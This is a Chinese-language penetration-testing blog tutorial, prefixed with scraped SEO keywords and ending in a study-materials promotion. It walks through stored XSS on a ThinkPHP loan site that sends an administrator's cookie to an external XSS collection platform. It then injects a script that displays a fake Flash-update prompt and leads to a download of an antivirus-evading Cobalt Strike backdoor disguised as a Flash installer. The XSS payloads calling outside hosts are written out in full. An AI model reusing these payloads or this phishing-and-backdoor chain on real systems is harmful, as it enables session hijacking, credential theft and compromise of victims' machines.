滎陽網(wǎng)站推廣,wordpress代碼片段,網(wǎng)站建設(shè)水上樂園,什么網(wǎng)站上做推廣前言 這是我給粉絲盆友們整理的網(wǎng)絡(luò)安全滲透測試入門階段XSS攻擊教程。 本階段主要講解XSS攻擊獲取用戶cookie和用戶密碼。 喜歡的朋友們#xff0c;記得給我點(diǎn)贊支持和收藏一下#xff0c;關(guān)注我#xff0c;學(xué)習(xí)黑客技術(shù)。 簡介 該篇章目的是重新牢固地基#xff0c;…前言這是我給粉絲盆友們整理的網(wǎng)絡(luò)安全滲透測試入門階段XSS攻擊教程。本階段主要講解XSS攻擊獲取用戶cookie和用戶密碼。喜歡的朋友們記得給我點(diǎn)贊支持和收藏一下關(guān)注我學(xué)習(xí)黑客技術(shù)。簡介該篇章目的是重新牢固地基加強(qiáng)每日訓(xùn)練操作的筆記在記錄地基筆記中會有很多跳躍性思維的操作和方式方法望大家能共同加油學(xué)到東西。請注意本文僅用于技術(shù)討論與研究對于所有筆記中復(fù)現(xiàn)的這些終端或者服務(wù)器都是自行搭建的環(huán)境進(jìn)行滲透的。我將使用Kali Linux作為此次學(xué)習(xí)的攻擊者機(jī)器。這里使用的技術(shù)僅用于學(xué)習(xí)教育目的如果列出的技術(shù)用于其他任何目標(biāo)本站及作者概不負(fù)責(zé)。一、前言網(wǎng)絡(luò)釣魚是社會工程學(xué)攻擊方式之一主要是通過對受害者心理弱點(diǎn)、本能反應(yīng)、好奇心、信任、貪婪等心理陷阱進(jìn)行諸如欺騙、傷害等危害手段網(wǎng)絡(luò)釣魚攻擊是個人和公司在保護(hù)其信息安全方面面臨的最常見的安全挑戰(zhàn)之一。無論是獲取密碼等還是其他敏感信息黑客都在使用電子郵件、社交媒體、電話和任何可能的通信方式竊取有價值的數(shù)據(jù)。這篇主要演示如何利用XSS植入釣魚獲得管理員內(nèi)部電腦權(quán)限二、環(huán)境介紹黑客攻擊者IP192.168.1.9系統(tǒng)kali.2020.4kali上作為cs的服務(wù)端VPS服務(wù)器thinkphp平臺地址http://test1.dayuixiyou.cn/釣魚地址http://flash.dayuixiyou.cn辦公電腦系統(tǒng)windwos7雙網(wǎng)卡192.168.175.153 和 10.10.1.5目前kali上運(yùn)行了Cobalt strike 攻擊者在自己的公網(wǎng)VPS服務(wù)器上制作了后門頁面釣魚通過滲透發(fā)現(xiàn)thinkphp貸款平臺頁面存在XSS漏洞利用通過插入XSS-js代碼植入鏈接最終黑客控制管理員辦公電腦的過程三、XSS演示此次演示貸款thinkphp平臺在公網(wǎng)服務(wù)器上1、注冊賬號密碼進(jìn)入個人中心注冊用戶名密碼登錄用戶名密碼后普通用戶界面點(diǎn)擊設(shè)置輸入結(jié)算信息測試下2、存在XSS漏洞輸入scriptalert(1)/script測試結(jié)果修改成功查看下前端…查看源代碼-編輯后查看到?jīng)]變動XSS代碼還是存在…說明存在XSS攻擊3、注冊XSS平臺https://xss.pt/xss.php?dologin進(jìn)入XSS利用平臺google也有很多別的平臺 隨意注冊一個賬號創(chuàng)建一個新的項(xiàng)目隨意填寫選擇Keepsession保持會話 下一步會彈出需要執(zhí)行的XSS利用代碼…選擇標(biāo)準(zhǔn)代碼測試/tExtArEasCRiPt sRChttps://xss.pt..aJ/sCrIpT4、利用XSS漏洞/tExtArEasCRiPt sRChttps://xss.pt/..aJ/sCrIpT這一段就是payload將XSS連接信息返回到https://xss.pt平臺上提交信息后可看到網(wǎng)絡(luò)net中XSS執(zhí)行成功了…執(zhí)行成功那么XSS平臺就收到了信息可看到5、獲取管理員cookie點(diǎn)擊提現(xiàn)…申請結(jié)算成功后會將XSS執(zhí)行代碼轉(zhuǎn)發(fā)到后臺結(jié)算該模塊中當(dāng)后臺管理員訪問管理界面給客戶結(jié)算資金的時候點(diǎn)擊提現(xiàn)申請模塊就會執(zhí)行XSS植入的代碼這時候就返回了管理員的cookie和URL信息6、cookie登錄后臺目錄掃描獲得管理后臺登錄頁面通過Burp suite轉(zhuǎn)包攔截后將XSS平臺獲取XSS漏洞植入代碼返回的包中修改其中的url和cookie信息send執(zhí)行后通過cookie進(jìn)入到了管理員后臺復(fù)制URL瀏覽器中訪問后正常進(jìn)入管理員后臺四、利用XSS釣魚1、搭建Flash釣魚頁面在公網(wǎng)服務(wù)器搭建釣魚頁面任何能訪問互聯(lián)網(wǎng)客戶都可以訪問該頁面2、生成免殺后門利用Cobal Strike生成C#語言的shell…利用該shell進(jìn)行混淆并利用python的tinyaes模塊混淆也行在來個分離免殺最后利用pyinstaller生成exe外殼…必過全國殺毒軟件不演示過程將flash修改名字為flashplayer_install_cn.exe或者修改為update等吸引人下載的名稱都行3、修改Flash源碼這是Flash貸款平臺源碼文件目錄修改index.html代碼找到其中href進(jìn)行修改為flashplayer_install_cn.exe意思就是點(diǎn)擊頁面立即下載就能自動下載目錄下的exe后門文件在準(zhǔn)備個js文件意思是執(zhí)行該js后會在頁面提示您的 FLASH 版本過低嘗試升級后訪問該頁面!并訪問到該頁面http://flash.dayuixiyou.cn/將exe和js都上傳到功能網(wǎng)服務(wù)器apache底層測試訪問可看到正常讀取確保內(nèi)網(wǎng)管理員能執(zhí)行XSS后訪問到j(luò)s文件這里就可以開始了4、利用XSS漏洞植入JS可看到利用三中XSS利用的方法執(zhí)行插入sCRiPtsRC//flash.dayuixiyou.cn/flash-test.js/sCrIpT#需要前后加入閉合 “ ”當(dāng)立即提交 后直接執(zhí)行了XSS植入的js文件并提示了js中的內(nèi)容然后點(diǎn)確定后直接跳轉(zhuǎn)到flash頁面和三中的方法一樣需要在后臺管理頁面也執(zhí)行XSS需要結(jié)算金額讓管理員去結(jié)算的時候點(diǎn)擊執(zhí)行XSS5、執(zhí)行XSS下載flash可看到內(nèi)網(wǎng)管理員上班期間登錄到管理后臺登錄管理員用戶后工作職責(zé)需要給客戶結(jié)算金額點(diǎn)擊了提現(xiàn)申請一般客戶安全意識極差點(diǎn)擊完成后出現(xiàn)了您的 FLASH 版本過低嘗試升級后訪問該頁面!一般情況下都會點(diǎn)擊確認(rèn)確認(rèn)后跳轉(zhuǎn)到flash頁面逼真的頁面點(diǎn)擊立即下載這里有個20.1MB的大小信息這里簡單在html修改下數(shù)字和EXE內(nèi)容大小即可可看到下載了該后門這里圖標(biāo)我沒修改google或者百度利用Folder Changer修改成flash安裝包的圖標(biāo)更逼真這里的exe是全免殺的殺毒軟件都無法放行6、成功XSS釣魚執(zhí)行安裝成功在kali攻擊機(jī)上的CS上線可看到獲取到了管理員電腦的權(quán)限五、總結(jié)這里通過滲透中找到了某平臺的XSS漏洞利用XSS漏洞植入代碼執(zhí)行誘騙到了對方客服或者管理員的內(nèi)網(wǎng)電腦權(quán)限其中最少需要熟悉如何搭站、HTML、js、域名、XSS、免殺、CS4等等知識才可搭建那么很多人都說flash都是經(jīng)典的釣魚漏洞了全國警惕性都會高很多那么我還是老話提供的是思路如果是一個破解軟件一個購買網(wǎng)站一個利用虛榮心或者是貪小便宜的購物頁面等等進(jìn)行釣魚進(jìn)行各類的植入的話那有多少人會中招希望大家提高安全意識沒有網(wǎng)絡(luò)安全就沒有國家安全今天基礎(chǔ)牢固就到這里雖然基礎(chǔ)但是必須牢記于心。網(wǎng)絡(luò)安全學(xué)習(xí)資源分享:給大家分享一份全套的網(wǎng)絡(luò)安全學(xué)習(xí)資料給那些想學(xué)習(xí) 網(wǎng)絡(luò)安全的小伙伴們一點(diǎn)幫助對于從來沒有接觸過網(wǎng)絡(luò)安全的同學(xué)我們幫你準(zhǔn)備了詳細(xì)的學(xué)習(xí)成長路線圖?？梢哉f是最科學(xué)最系統(tǒng)的學(xué)習(xí)路線大家跟著這個大的方向?qū)W習(xí)準(zhǔn)沒問題。因篇幅有限僅展示部分資料朋友們?nèi)绻行枰住毒W(wǎng)絡(luò)安全入門進(jìn)階學(xué)習(xí)資源包》請看下方掃描即可前往獲取